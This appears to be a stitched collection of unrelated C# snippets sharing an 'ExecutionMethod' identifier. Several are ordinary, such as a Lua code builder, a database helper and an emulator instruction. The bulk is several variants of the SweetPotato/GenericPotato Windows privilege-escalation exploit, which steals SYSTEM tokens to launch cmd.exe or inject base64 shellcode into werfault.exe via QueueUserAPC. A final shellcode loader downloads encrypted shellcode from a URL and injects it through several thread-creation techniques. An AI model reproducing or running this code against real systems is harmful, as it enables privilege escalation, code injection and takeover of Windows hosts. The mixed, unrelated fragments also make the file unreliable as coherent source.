public static void SetupCode(this Entity <IUIPool> @this, ExecutionMethod method, string code)
{
var codeComponent = @this.Need <LuaCode>();
codeComponent.Value.Set(method, code);
@this.ReplaceInstance(codeComponent);
}
public static bool DeleteProductRelation <T>(string ProductDetailID)
{
try
{
// 插入到数据库中
Type type = typeof(T);
object obj = Activator.CreateInstance(type);
StringBuilder strSql = new StringBuilder();
strSql.Append("delete from [" + obj.GetType().Name + "] where ProductDetailID=@ProductDetailID");
SqlParameter[] sqlParameter =
{
new SqlParameter("@ProductDetailID", SqlDbType.NVarChar, 30)
{
Value = ProductDetailID
}
};
int val = ExecutionMethod.ExecuteNonQuery(strSql.ToString(), sqlParameter);
if (val > 0)
{
return(true);
}
else
{
return(false);
}
}
catch (Exception ex)
{
LogTool.LogWriter.WriteError("查询失败:" + ex.ToString());
}
return(true);
}
public LuaCodeBuilder RemoveMethod(ExecutionMethod method)
{
if (_code.ContainsKey(method))
{
_code.Remove(method);
}
return(this);
}
public LuaCodeBuilder Set(ExecutionMethod method, string code = null)
{
if (string.IsNullOrEmpty(code))
{
return(RemoveMethod(method));
}
return(AddMethod(method, code));
}
public LuaCodeBuilder AddMethod(ExecutionMethod method, string code)
{
if (!_code.ContainsKey(method))
{
_code.Add(method, string.Empty);
}
_code[method] = code;
return(this);
}
public async Task <IActionResult> DuplicateSellersReport(int sellerId, ExecutionMethod method)
{
Seller[] model = null;
//Show use of ADO to get the seller
if (method == ExecutionMethod.ADONET)
{
model = await GetDuplicateSellersADO(sellerId);
}
else
{
model = await GetDuplicateSellersEF(sellerId);
}
return(View(model));
}
private static string SignatureFor(ExecutionMethod method)
{
switch (method)
{
case ExecutionMethod.Click:
case ExecutionMethod.MouseOut:
case ExecutionMethod.MouseOver:
return("event");
case ExecutionMethod.LoopItteration:
return("item, index");
default:
return("");
}
}
static void Main(string[] args)
{
ushort port = 8888;
string host = "127.0.0.1";
string program = @"c:\Windows\System32\cmd.exe";
string programArgs = null;
ExecutionMethod executionMethod = ExecutionMethod.Auto;
PotatoAPI.Mode mode = PotatoAPI.Mode.SMB;
bool showHelp = false;
Console.WriteLine(
"GenericPotato by @micahvandeusen\n" +
" Modified from SweetPotato by @_EthicalChaos_\n"
);
OptionSet option_set = new OptionSet()
.Add <ExecutionMethod>("m=|method=", "Auto,User,Thread (default Auto)", v => executionMethod = v)
.Add("p=|prog=", "Program to launch (default cmd.exe)", v => program = v)
.Add("a=|args=", "Arguments for program (default null)", v => programArgs = v)
.Add <PotatoAPI.Mode>("e=|exploit=", "Exploit mode [HTTP|SMB(default)] ", v => mode = v)
.Add <ushort>("l=|port=", "HTTP port to listen on (default 8888)", v => port = v)
.Add("i=|host=", "HTTP host to listen on (default 127.0.0.1)", v => host = v)
.Add("h|help", "Display this help", v => showHelp = v != null);
try {
option_set.Parse(args);
if (showHelp)
{
PrintHelp(option_set);
return;
}
} catch (Exception e) {
Console.WriteLine("[!] Failed to parse arguments: {0}", e.Message);
PrintHelp(option_set);
return;
}
try {
bool hasImpersonate = EnablePrivilege(SecurityEntity.SE_IMPERSONATE_NAME);
bool hasPrimary = EnablePrivilege(SecurityEntity.SE_ASSIGNPRIMARYTOKEN_NAME);
bool hasIncreaseQuota = EnablePrivilege(SecurityEntity.SE_INCREASE_QUOTA_NAME);
if (!hasImpersonate && !hasPrimary)
{
Console.WriteLine("[!] Cannot perform interception, necessary privileges missing. Are you running under a Service account?");
return;
}
if (executionMethod == ExecutionMethod.Auto)
{
if (hasImpersonate)
{
executionMethod = ExecutionMethod.Token;
}
else if (hasPrimary)
{
executionMethod = ExecutionMethod.User;
}
}
PotatoAPI potatoAPI = new PotatoAPI(port, host, mode);
potatoAPI.readyEvent.WaitOne(); // Wait for listener to start
Console.WriteLine($"[+] Listener ready");
if (!potatoAPI.Trigger())
{
Console.WriteLine("[!] Trigger failed");
return;
}
potatoAPI.readyEvent.WaitOne(); // Wait for connection
Console.WriteLine($"[+] Intercepted and authenticated successfully, launching {program}");
IntPtr impersonatedPrimary;
if (!DuplicateTokenEx(potatoAPI.Token, TOKEN_ALL_ACCESS, IntPtr.Zero,
SECURITY_IMPERSONATION_LEVEL.SecurityIdentification, TOKEN_TYPE.TokenPrimary, out impersonatedPrimary))
{
Console.WriteLine("[!] Failed to impersonate security context token");
return;
}
Thread systemThread = new Thread(() => {
SetThreadToken(IntPtr.Zero, potatoAPI.Token);
STARTUPINFO si = new STARTUPINFO();
PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
si.cb = Marshal.SizeOf(si);
si.lpDesktop = @"WinSta0\Default";
string finalArgs = null;
if (programArgs != null)
{
finalArgs = string.Format("\"{0}\" {1}", program, programArgs);
}
Console.WriteLine($"[+] Running {finalArgs}");
if (executionMethod == ExecutionMethod.Token)
{
if (!CreateProcessWithTokenW(potatoAPI.Token, 0, program, finalArgs, CreationFlags.NewConsole, IntPtr.Zero, null, ref si, out pi))
{
Console.WriteLine("[!] Failed to created impersonated process with token: {0}", Marshal.GetLastWin32Error());
return;
}
}
else
{
if (!CreateProcessAsUserW(impersonatedPrimary, program, finalArgs, IntPtr.Zero,
IntPtr.Zero, false, CREATE_NEW_CONSOLE, IntPtr.Zero, @"C:\", ref si, out pi))
{
Console.WriteLine("[!] Failed to created impersonated process with user: {0} ", Marshal.GetLastWin32Error());
return;
}
}
Console.WriteLine("[+] Process created, enjoy!");
});
systemThread.Start();
systemThread.Join();
} catch (Exception e) {
Console.WriteLine("[!] Failed to exploit: {0} ", e.Message);
Console.WriteLine(e.StackTrace.ToString());
}
}
static void Main(string[] args)
{
string clsId = "4991D34B-80A1-4291-83B6-3328366B9097";
ushort port = 6666;
string program = @"c:\Windows\System32\cmd.exe";
string programArgs = null;
ExecutionMethod executionMethod = ExecutionMethod.Auto;
bool showHelp = false;
bool isBITSRequired = false;
bool flag = false;
Console.WriteLine(
"Modify by Zero Team Uknow\n" +
"SweetPotato by @_EthicalChaos_\n"
);
OptionSet option_set = new OptionSet()
.Add <string>("c=|clsid=", "CLSID (default BITS: 4991D34B-80A1-4291-83B6-3328366B9097)", v => clsId = v)
.Add <ExecutionMethod>("m=|method=", "Auto,User,Thread (default Auto)", v => executionMethod = v)
.Add("p=|prog=", "Program to launch (default cmd.exe)", v => program = v)
.Add("a=|args=", "Arguments for program (default null)", v => programArgs = v)
.Add <ushort>("l=|listenPort=", "COM server listen port (default 6666)", v => port = v)
.Add("h|help", "Display this help", v => showHelp = v != null);
try {
option_set.Parse(args);
if (showHelp)
{
PrintHelp(option_set);
return;
}
} catch (Exception e) {
Console.WriteLine("[!] Failed to parse arguments: {0}", e.Message);
PrintHelp(option_set);
return;
}
try {
if (isBITSRequired = IsBITSRequired())
{
clsId = "4991D34B-80A1-4291-83B6-3328366B9097";
Console.WriteLine("[=] Your version of Windows fixes DCOM interception forcing BITS to perform WinRM intercept");
}
bool hasImpersonate = EnablePrivilege(SecurityEntity.SE_IMPERSONATE_NAME);
bool hasPrimary = EnablePrivilege(SecurityEntity.SE_ASSIGNPRIMARYTOKEN_NAME);
bool hasIncreaseQuota = EnablePrivilege(SecurityEntity.SE_INCREASE_QUOTA_NAME);
if (!hasImpersonate && !hasPrimary)
{
Console.WriteLine("[!] Cannot perform NTLM interception, neccessary priveleges missing. Are you running under a Service account?");
return;
}
if (executionMethod == ExecutionMethod.Auto)
{
if (hasImpersonate)
{
executionMethod = ExecutionMethod.Token;
}
else if (hasPrimary)
{
executionMethod = ExecutionMethod.User;
}
}
Console.WriteLine("[+] Attempting {0} with CLID {1} on port {2} using method {3} to launch {4}",
isBITSRequired ? "NTLM Auth" : "DCOM NTLM interception", clsId, isBITSRequired ? 5985 : port, executionMethod, program);
PotatoAPI potatoAPI = new PotatoAPI(new Guid(clsId), port, isBITSRequired);
if (!potatoAPI.TriggerDCOM())
{
Console.WriteLine("[!] No authenticated interception took place, exploit failed");
return;
}
Console.WriteLine("[+] Intercepted and authenticated successfully, launching program");
IntPtr impersonatedPrimary;
if (!DuplicateTokenEx(potatoAPI.Token, TOKEN_ALL_ACCESS, IntPtr.Zero,
SECURITY_IMPERSONATION_LEVEL.SecurityIdentification, TOKEN_TYPE.TokenPrimary, out impersonatedPrimary))
{
Console.WriteLine("[!] Failed to impersonate security context token");
return;
}
SECURITY_ATTRIBUTES saAttr = new SECURITY_ATTRIBUTES();
saAttr.nLength = Marshal.SizeOf(typeof(SECURITY_ATTRIBUTES));
saAttr.bInheritHandle = 0x1;
saAttr.lpSecurityDescriptor = IntPtr.Zero;
if (CreatePipe(ref out_read, ref out_write, ref saAttr, 0))
{
Console.WriteLine("[+] CreatePipe success");
}
SetHandleInformation(out_read, HANDLE_FLAG_INHERIT, 0);
SetHandleInformation(err_read, HANDLE_FLAG_INHERIT, 0);
Thread systemThread = new Thread(() =>
{
SetThreadToken(IntPtr.Zero, potatoAPI.Token);
STARTUPINFO si = new STARTUPINFO();
PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
si.cb = Marshal.SizeOf(si);
si.lpDesktop = @"WinSta0\Default";
si.hStdOutput = out_write;
si.hStdError = err_write;
si.dwFlags |= STARTF_USESTDHANDLES;
Console.WriteLine("[+] Created launch thread using impersonated user {0}", WindowsIdentity.GetCurrent(true).Name);
string finalArgs = null;
if (programArgs != null)
{
programArgs = "/c " + programArgs;
finalArgs = string.Format("\"{0}\" {1}", program, programArgs);
Console.WriteLine("[+] Command : {0} ", finalArgs);
}
if (executionMethod == ExecutionMethod.Token)
{
flag = CreateProcessWithTokenW(potatoAPI.Token, 0, program, finalArgs, CREATE_NO_WINDOW, IntPtr.Zero, null, ref si, out pi);
Console.WriteLine("[+] process with pid: {0} created.\n\n=====================================\n", pi.dwProcessId);
if (!flag)
{
Console.WriteLine("[!] Failed to created impersonated process with token: {0}", Marshal.GetLastWin32Error());
return;
}
}
else
{
flag = CreateProcessAsUserW(impersonatedPrimary, program, finalArgs, IntPtr.Zero,
IntPtr.Zero, false, CREATE_NO_WINDOW, IntPtr.Zero, @"C:\", ref si, out pi);
Console.WriteLine("[+] process with pid: {0} created.\n\n=====================================\n", pi.dwProcessId);
if (!flag)
{
Console.WriteLine("[!] Failed to created impersonated process with user: {0} ", Marshal.GetLastWin32Error());
return;
}
}
CloseHandle(out_write);
byte[] buf = new byte[BUFSIZE];
int dwRead = 0;
while (ReadFile(out_read, buf, BUFSIZE, ref dwRead, IntPtr.Zero))
{
byte[] outBytes = new byte[dwRead];
Array.Copy(buf, outBytes, dwRead);
Console.WriteLine(System.Text.Encoding.Default.GetString(outBytes));
}
CloseHandle(out_read);
Console.WriteLine("[+] Process created, enjoy!");
});
systemThread.Start();
systemThread.Join();
}
catch (Exception e) {
Console.WriteLine("[!] Failed to exploit COM: {0} ", e.Message);
Console.WriteLine(e.StackTrace.ToString());
}
}
static void Main(string[] args)
{
string clsId = "4991D34B-80A1-4291-83B6-3328366B9097";
ushort port = 6666;
string program = @"c:\Windows\System32\werfault.exe";
string shellcode = null;
ExecutionMethod executionMethod = ExecutionMethod.Auto;
bool showHelp = false;
bool isBITSRequired = false;
Console.WriteLine(
"[+] SweetPotato by @_EthicalChaos_,fixed by 2020/4/16\n");
OptionSet option_set = new OptionSet()
.Add <string>("c=|clsid=", "CLSID (default BITS: 4991D34B-80A1-4291-83B6-3328366B9097)", v => clsId = v)
.Add <ExecutionMethod>("m=|method=", "Auto,User,Thread (default Auto)", v => executionMethod = v)
.Add("p=|prog=", "Run a Process (werfault.exe)", v => program = v)
.Add("s=|shellcode=", "Arguments for program (default null)", v => shellcode = v)
.Add <ushort>("l=|listenPort=", "COM server listen port (default 6666)", v => port = v)
.Add("h|help", "Display this help", v => showHelp = v != null);
try {
option_set.Parse(args);
if (showHelp)
{
PrintHelp(option_set);
return;
}
} catch (Exception e) {
Console.WriteLine("[!] Failed to parse arguments: {0}", e.Message);
PrintHelp(option_set);
return;
}
try {
if (isBITSRequired = IsBITSRequired())
{
clsId = "4991D34B-80A1-4291-83B6-3328366B9097";
Console.WriteLine("[=] Your version of Windows fixes DCOM interception forcing BITS to perform WinRM intercept");
return;
}
bool hasImpersonate = EnablePrivilege(SecurityEntity.SE_IMPERSONATE_NAME);
bool hasPrimary = EnablePrivilege(SecurityEntity.SE_ASSIGNPRIMARYTOKEN_NAME);
bool hasIncreaseQuota = EnablePrivilege(SecurityEntity.SE_INCREASE_QUOTA_NAME);
if (!hasImpersonate && !hasPrimary)
{
Console.WriteLine("[!] Cannot perform NTLM interception, neccessary priveleges missing. Are you running under a Service account?");
return;
}
if (executionMethod == ExecutionMethod.Auto)
{
if (hasImpersonate)
{
executionMethod = ExecutionMethod.Token;
}
else if (hasPrimary)
{
executionMethod = ExecutionMethod.User;
}
}
Console.WriteLine("[+] Attempting {0} with CLID {1} on port {2} using method {3} to launch {4}",
isBITSRequired ? "NTLM Auth" : "DCOM NTLM interception", clsId, isBITSRequired ? 5985 : port, executionMethod, program);
PotatoAPI potatoAPI = new PotatoAPI(new Guid(clsId), port, isBITSRequired);
if (!potatoAPI.TriggerDCOM())
{
Console.WriteLine("[!] No authenticated interception took place, exploit failed");
return;
}
Console.WriteLine("[+] Intercepted and authenticated successfully, launching program");
IntPtr impersonatedPrimary;
if (!DuplicateTokenEx(potatoAPI.Token, TOKEN_ALL_ACCESS, IntPtr.Zero,
SECURITY_IMPERSONATION_LEVEL.SecurityIdentification, TOKEN_TYPE.TokenPrimary, out impersonatedPrimary))
{
Console.WriteLine("[!] Failed to impersonate security context token");
return;
}
Thread systemThread = new Thread(() => {
SetThreadToken(IntPtr.Zero, potatoAPI.Token);
STARTUPINFO si = new STARTUPINFO();
PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
si.cb = Marshal.SizeOf(si);
si.lpDesktop = @"WinSta0\Default";
Console.WriteLine("[+] Created launch thread using impersonated user {0}", WindowsIdentity.GetCurrent(true).Name);
string finalArgs = null;
/*
* if(shellcode != null)
* finalArgs = string.Format("\"{0}\" {1}", program, args);
*/
if (executionMethod == ExecutionMethod.Token)
{
if (!CreateProcessWithTokenW(potatoAPI.Token, 0, program, finalArgs, CreationFlags.Suspended, IntPtr.Zero, null, ref si, out pi))
{
Console.WriteLine("[!] Failed to created impersonated process with token: {0}", Marshal.GetLastWin32Error());
return;
}
}
else
{
if (!CreateProcessAsUserW(impersonatedPrimary, program, finalArgs, IntPtr.Zero,
IntPtr.Zero, false, 0x00000004, IntPtr.Zero, @"C:\", ref si, out pi))
{
Console.WriteLine("[!] Failed to created impersonated process with user: {0} ", Marshal.GetLastWin32Error());
return;
}
}
byte[] b_shellcode = Convert.FromBase64String(shellcode);
//byte[] shellcode = new byte[112] {0x50,0x51,0x52,0x53,0x56,0x57,0x55,0x54,0x58,0x66,0x83,0xe4,0xf0,0x50,0x6a,0x60,0x5a,0x68,0x63,0x61,0x6c,0x63,0x54,0x59,0x48,0x29,0xd4,0x65,0x48,0x8b,0x32,0x48,0x8b,0x76,0x18,0x48,0x8b,0x76,0x10,0x48,0xad,0x48,0x8b,0x30,0x48,0x8b,0x7e,0x30,0x03,0x57,0x3c,0x8b,0x5c,0x17,0x28,0x8b,0x74,0x1f,0x20,0x48,0x01,0xfe,0x8b,0x54,0x1f,0x24,0x0f,0xb7,0x2c,0x17,0x8d,0x52,0x02,0xad,0x81,0x3c,0x07,0x57,0x69,0x6e,0x45,0x75,0xef,0x8b,0x74,0x1f,0x1c,0x48,0x01,0xfe,0x8b,0x34,0xae,0x48,0x01,0xf7,0x99,0xff,0xd7,0x48,0x83,0xc4,0x68,0x5c,0x5d,0x5f,0x5e,0x5b,0x5a,0x59,0x58,0xc3};
// Allocate memory within process and write shellcode
IntPtr resultPtr = VirtualAllocEx(pi.hProcess, IntPtr.Zero, b_shellcode.Length, MEM_COMMIT, PAGE_READWRITE);
IntPtr bytesWritten = IntPtr.Zero;
//Marshal.Copy(b_shellcode, 0, resultPtr, b_shellcode.Length);
bool resultBool = WriteProcessMemory(pi.hProcess, resultPtr, b_shellcode, b_shellcode.Length, out bytesWritten);
// Open thread
IntPtr sht = OpenThread(ThreadAccess.SET_CONTEXT, false, (int)pi.dwThreadId);
uint oldProtect = 0;
// Modify memory permissions on allocated shellcode
resultBool = VirtualProtectEx(pi.hProcess, resultPtr, b_shellcode.Length, PAGE_EXECUTE_READ, out oldProtect);
// Assign address of shellcode to the target thread apc queue
IntPtr ptr = QueueUserAPC(resultPtr, sht, IntPtr.Zero);
IntPtr ThreadHandle = pi.hThread;
ResumeThread(ThreadHandle);
Console.WriteLine("[+] Process created, enjoy!");
});
systemThread.Start();
systemThread.Join();
} catch (Exception e) {
Console.WriteLine("[!] Failed to exploit COM: {0} ", e.Message);
Console.WriteLine(e.StackTrace.ToString());
}
}
static void Main(string[] args)
{
string clsId = "4991D34B-80A1-4291-83B6-3328366B9097";
ushort port = 6666;
string program = @"c:\Windows\System32\werfault.exe";
string shellcode = null;
ExecutionMethod executionMethod = ExecutionMethod.Auto;
bool showHelp = false;
bool isBITSRequired = false;
Console.WriteLine(
"Modifying SweetPotato by Uknow to support load shellcode \n" +
"Github: https://github.com/uknowsec/SweetPotato \n" +
"SweetPotato by @_EthicalChaos_\n" +
" Orignal RottenPotato code and exploit by @foxglovesec\n" +
" Weaponized JuciyPotato by @decoder_it and @Guitro along with BITS WinRM discovery\n"
);
OptionSet option_set = new OptionSet()
.Add <string>("c=|clsid=", "CLSID (default BITS: 4991D34B-80A1-4291-83B6-3328366B9097)", v => clsId = v)
.Add <ExecutionMethod>("m=|method=", "Auto,User,Thread (default Auto)", v => executionMethod = v)
.Add("p=|prog=", "Program to launch (default werfault.exe)", v => program = v)
.Add("s=|shellcode=", "Arguments for program (default null)", v => shellcode = v)
.Add <ushort>("l=|listenPort=", "COM server listen port (default 6666)", v => port = v)
.Add("h|help", "Display this help", v => showHelp = v != null);
try {
option_set.Parse(args);
if (showHelp)
{
PrintHelp(option_set);
return;
}
} catch (Exception e) {
Console.WriteLine("[!] Failed to parse arguments: {0}", e.Message);
PrintHelp(option_set);
return;
}
try {
if (isBITSRequired = IsBITSRequired())
{
clsId = "4991D34B-80A1-4291-83B6-3328366B9097";
Console.WriteLine("[=] Your version of Windows fixes DCOM interception forcing BITS to perform WinRM intercept");
}
bool hasImpersonate = EnablePrivilege(SecurityEntity.SE_IMPERSONATE_NAME);
bool hasPrimary = EnablePrivilege(SecurityEntity.SE_ASSIGNPRIMARYTOKEN_NAME);
bool hasIncreaseQuota = EnablePrivilege(SecurityEntity.SE_INCREASE_QUOTA_NAME);
if (!hasImpersonate && !hasPrimary)
{
Console.WriteLine("[!] Cannot perform NTLM interception, neccessary priveleges missing. Are you running under a Service account?");
return;
}
if (executionMethod == ExecutionMethod.Auto)
{
if (hasImpersonate)
{
executionMethod = ExecutionMethod.Token;
}
else if (hasPrimary)
{
executionMethod = ExecutionMethod.User;
}
}
Console.WriteLine("[+] Attempting {0} with CLID {1} on port {2} using method {3} to launch {4}",
isBITSRequired ? "NTLM Auth" : "DCOM NTLM interception", clsId, isBITSRequired ? 5985 : port, executionMethod, program);
PotatoAPI potatoAPI = new PotatoAPI(new Guid(clsId), port, isBITSRequired);
if (!potatoAPI.TriggerDCOM())
{
Console.WriteLine("[!] No authenticated interception took place, exploit failed");
return;
}
Console.WriteLine("[+] Intercepted and authenticated successfully, launching program");
IntPtr impersonatedPrimary;
if (!DuplicateTokenEx(potatoAPI.Token, TOKEN_ALL_ACCESS, IntPtr.Zero,
SECURITY_IMPERSONATION_LEVEL.SecurityIdentification, TOKEN_TYPE.TokenPrimary, out impersonatedPrimary))
{
Console.WriteLine("[!] Failed to impersonate security context token");
return;
}
Thread systemThread = new Thread(() => {
SetThreadToken(IntPtr.Zero, potatoAPI.Token);
STARTUPINFO si = new STARTUPINFO();
PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
si.cb = Marshal.SizeOf(si);
si.lpDesktop = @"WinSta0\Default";
Console.WriteLine("[+] Created launch thread using impersonated user {0}", WindowsIdentity.GetCurrent(true).Name);
string finalArgs = null;
if (executionMethod == ExecutionMethod.Token)
{
if (!CreateProcessWithTokenW(potatoAPI.Token, 0, program, finalArgs, CreationFlags.NewConsole, IntPtr.Zero, null, ref si, out pi))
{
Console.WriteLine("[!] Failed to created impersonated process with token: {0}", Marshal.GetLastWin32Error());
return;
}
}
else
{
if (!CreateProcessAsUserW(impersonatedPrimary, program, finalArgs, IntPtr.Zero,
IntPtr.Zero, false, CREATE_NEW_CONSOLE, IntPtr.Zero, @"C:\", ref si, out pi))
{
Console.WriteLine("[!] Failed to created impersonated process with user: {0} ", Marshal.GetLastWin32Error());
return;
}
}
byte[] b_shellcode = Convert.FromBase64String(shellcode);
uint lpNumberOfBytesWritten = 0;
IntPtr pHandle = OpenProcess((uint)ProcessAccessRights.All, false, (uint)pi.dwProcessId);
Console.WriteLine(String.Format(@"[+] OpenProcess Pid: {0}", pi.dwProcessId.ToString()));
IntPtr rMemAddress = VirtualAllocEx(pHandle, IntPtr.Zero, (uint)b_shellcode.Length, (uint)MemAllocation.MEM_RESERVE | (uint)MemAllocation.MEM_COMMIT, (uint)MemProtect.PAGE_EXECUTE_READWRITE);
Console.WriteLine(@"[+] VirtualAllocEx Success");
if (WriteProcessMemory(pHandle, rMemAddress, b_shellcode, (uint)b_shellcode.Length, ref lpNumberOfBytesWritten))
{
IntPtr tHandle = OpenThread(ThreadAccess.THREAD_ALL, false, (uint)pi.dwThreadId);
IntPtr ptr = QueueUserAPC(rMemAddress, tHandle, IntPtr.Zero);
ResumeThread(tHandle);
Console.WriteLine(String.Format(@"[+] QueueUserAPC Inject shellcode to PID: {0} Success", pi.dwProcessId.ToString()));
}
bool hOpenProcessClose = CloseHandle(pHandle);
if (hOpenProcessClose)
{
Console.WriteLine(@"[+] hOpenProcessClose Success");
}
Console.WriteLine("\n\n[*] QueueUserAPC Inject shellcode Success, enjoy!");
});
systemThread.Start();
systemThread.Join();
} catch (Exception e) {
Console.WriteLine("[!] Failed to exploit COM: {0} ", e.Message);
Console.WriteLine(e.StackTrace.ToString());
}
}
static void Main(string[] args)
{
string clsId = "4991D34B-80A1-4291-83B6-3328366B9097";
ushort port = 6666;
string program = @"c:\Windows\System32\cmd.exe";
string programArgs = null;
ExecutionMethod executionMethod = ExecutionMethod.Auto;
PotatoAPI.Mode mode = PotatoAPI.Mode.PrintSpoofer;
bool showHelp = false;
bool isBITSRequired = false;
Console.WriteLine(
"SweetPotato by @_EthicalChaos_\n" +
" Orignal RottenPotato code and exploit by @foxglovesec\n" +
" Weaponized JuciyPotato by @decoder_it and @Guitro along with BITS WinRM discovery\n" +
" PrintSpoofer discovery and original exploit by @itm4n\n" +
" EfsRpc built on EfsPotato by @zcgonvh and PetitPotam by @topotam"
);
OptionSet option_set = new OptionSet()
.Add <string>("c=|clsid=", "CLSID (default BITS: 4991D34B-80A1-4291-83B6-3328366B9097)", v => clsId = v)
.Add <ExecutionMethod>("m=|method=", "Auto,User,Thread (default Auto)", v => executionMethod = v)
.Add("p=|prog=", "Program to launch (default cmd.exe)", v => program = v)
.Add("a=|args=", "Arguments for program (default null)", v => programArgs = v)
.Add <PotatoAPI.Mode>("e=|exploit=", "Exploit mode [DCOM|WinRM|EfsRpc|PrintSpoofer(default)] ", v => mode = v)
.Add <ushort>("l=|listenPort=", "COM server listen port (default 6666)", v => port = v)
.Add("h|help", "Display this help", v => showHelp = v != null);
try {
option_set.Parse(args);
if (showHelp)
{
PrintHelp(option_set);
return;
}
} catch (Exception e) {
Console.WriteLine("[!] Failed to parse arguments: {0}", e.Message);
PrintHelp(option_set);
return;
}
try {
bool hasImpersonate = EnablePrivilege(SecurityEntity.SE_IMPERSONATE_NAME);
bool hasPrimary = EnablePrivilege(SecurityEntity.SE_ASSIGNPRIMARYTOKEN_NAME);
bool hasIncreaseQuota = EnablePrivilege(SecurityEntity.SE_INCREASE_QUOTA_NAME);
if (!hasImpersonate && !hasPrimary)
{
Console.WriteLine("[!] Cannot perform interception, necessary privileges missing. Are you running under a Service account?");
return;
}
if (executionMethod == ExecutionMethod.Auto)
{
if (hasImpersonate)
{
executionMethod = ExecutionMethod.Token;
}
else if (hasPrimary)
{
executionMethod = ExecutionMethod.User;
}
}
if (mode == PotatoAPI.Mode.PrintSpoofer)
{
Console.WriteLine($"[+] Attempting NP impersonation using method PrintSpoofer to launch {program}");
}
else if (mode == PotatoAPI.Mode.EfsRpc)
{
Console.WriteLine($"[+] Attempting NP impersonation using method EfsRpc to launch {program}");
}
else
{
Console.WriteLine("[+] Attempting {0} with CLID {1} on port {2} using method {3} to launch {4}",
isBITSRequired ? "NTLM Auth" : "DCOM NTLM interception", clsId, isBITSRequired ? 5985 : port, executionMethod, program);
}
PotatoAPI potatoAPI = new PotatoAPI(new Guid(clsId), port, mode);
if (!potatoAPI.Trigger())
{
Console.WriteLine("[!] No authenticated interception took place, exploit failed");
return;
}
Console.WriteLine("[+] Intercepted and authenticated successfully, launching program");
IntPtr impersonatedPrimary;
if (!DuplicateTokenEx(potatoAPI.Token, TOKEN_ALL_ACCESS, IntPtr.Zero,
SECURITY_IMPERSONATION_LEVEL.SecurityIdentification, TOKEN_TYPE.TokenPrimary, out impersonatedPrimary))
{
Console.WriteLine("[!] Failed to impersonate security context token");
return;
}
Thread systemThread = new Thread(() => {
SetThreadToken(IntPtr.Zero, potatoAPI.Token);
STARTUPINFO si = new STARTUPINFO();
PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
si.cb = Marshal.SizeOf(si);
si.lpDesktop = @"WinSta0\Default";
//Console.WriteLine("[+] Created launch thread using impersonated user {0}", WindowsIdentity.GetCurrent(true).Name);
string finalArgs = null;
if (programArgs != null)
{
finalArgs = string.Format("\"{0}\" {1}", program, programArgs);
}
if (executionMethod == ExecutionMethod.Token)
{
if (!CreateProcessWithTokenW(potatoAPI.Token, 0, program, finalArgs, CreationFlags.NewConsole, IntPtr.Zero, null, ref si, out pi))
{
Console.WriteLine("[!] Failed to created impersonated process with token: {0}", Marshal.GetLastWin32Error());
return;
}
}
else
{
if (!CreateProcessAsUserW(impersonatedPrimary, program, finalArgs, IntPtr.Zero,
IntPtr.Zero, false, CREATE_NEW_CONSOLE, IntPtr.Zero, @"C:\", ref si, out pi))
{
Console.WriteLine("[!] Failed to created impersonated process with user: {0} ", Marshal.GetLastWin32Error());
return;
}
}
Console.WriteLine("[+] Process created, enjoy!");
});
systemThread.Start();
systemThread.Join();
} catch (Exception e) {
Console.WriteLine("[!] Failed to exploit COM: {0} ", e.Message);
Console.WriteLine(e.StackTrace.ToString());
}
}
/// <summary>
/// Executes the instruction
/// </summary>
/// <param name="machine"></param>
/// <param name="b1"></param>
/// <param name="b2"></param>
public void Execute(i8080.i8080 machine, byte b1, byte b2)
{
ExecutionMethod?.Invoke(machine, b1, b2);
}
static void Main(string[] args)
{
const ExecutionMethod exeMethod = ExecutionMethod.CreateFiber; // CHANGE THIS; shellcode exectuon method
string ParentName = "explorer"; // CHANGE THIS: name of parent process
string ProgramPath = @"C:\Program Files\Internet Explorer\iexplore.exe"; // CHANGE THIS: path to process shellcode will be injected into
string ShellcodeUrl = ""; // CHANGE THIS; URL of encrypted shellcode if downloading from web
// Read the encrypted shellcode in Shellycode.cs
EncryptedShellcode sc = new EncryptedShellcode();
string EncryptedShellcode = sc.EncSc;
// If shellcode does not exist within Shellycode.cs, download from web
if (EncryptedShellcode == "")
{
Console.WriteLine("[*] No encrypted shellcode found in Shellycode.cs");
Console.WriteLine($"[*] Downloading encrypted shellcode from {ShellcodeUrl}");
try
{
WebClient wc = new System.Net.WebClient();
EncryptedShellcode = wc.DownloadString(ShellcodeUrl);
Console.WriteLine("[*] Shellcode downloaded");
}
catch
{
Console.WriteLine("[!] Error downloading shellcode!");
Environment.Exit(1);
}
}
else
{
Console.WriteLine("[*] Encrypted shellcode found in Shellycode.cs");
}
// Decrypt and decode the shellcode for our byte array
string ShellcodeB64 = Dec(EncryptedShellcode);
byte[] Shellcode = Convert.FromBase64String(ShellcodeB64);
// pass shellcode to our execution function
switch (exeMethod)
{
case ExecutionMethod.CreateFiber:
Console.WriteLine("[*] Execution method: CreateFiber");
CreateFiber.ExecuteCreateFiber(Shellcode);
break;
case ExecutionMethod.CreateRemoteThread:
Console.WriteLine("[*] Execution method: CreateRemoteThread");
CreateRemoteThread.ExecuteCreateRemoteThread(ParentName, ProgramPath, Shellcode);
break;
case ExecutionMethod.CreateRemoteThreadEx:
Console.WriteLine("[*] Execution method: CreateRemoteThreadEx");
CreateRemoteThreadEx.ExecuteCreateRemoteThreadEx(ParentName, ProgramPath, Shellcode);
break;
case ExecutionMethod.CreateThread:
Console.WriteLine("[*] Execution method: CreateThread");
CreateThread.ExecuteCreateThread(Shellcode);
break;
case ExecutionMethod.EtwpCreateEtwThread:
Console.WriteLine("[*] Execution method: EtwpCreateEtwThread");
EtwpCreateEtwThread.ExecuteEtwpCreateEtwThread(Shellcode);
break;
case ExecutionMethod.QueueUserAPC:
Console.WriteLine("[*] Execution method: QueueUserAPC");
QueueUserAPC.ExecuteQueueUserAPC(ParentName, ProgramPath, Shellcode);
break;
case ExecutionMethod.RtlCreateUserThread:
Console.WriteLine("[*] Execution method: RtlCreateUserThread");
RtlCreateUserThread.ExecuteRtlCreateUserThread(ParentName, ProgramPath, Shellcode);
break;
}
}
public AsyncCommand(Expression<Action> expression, bool apm = false)
{
method = apm
? ExecutionMethod.UseApmMethodPair(this, expression)
: ExecutionMethod.QueueUserWorkItem(this, expression);
}
public static dynamic ThrowNotSupported(ExecutionMethod method)
{
throw new NotSupportedException("The operation " + method + " was not supported for this query.");
}
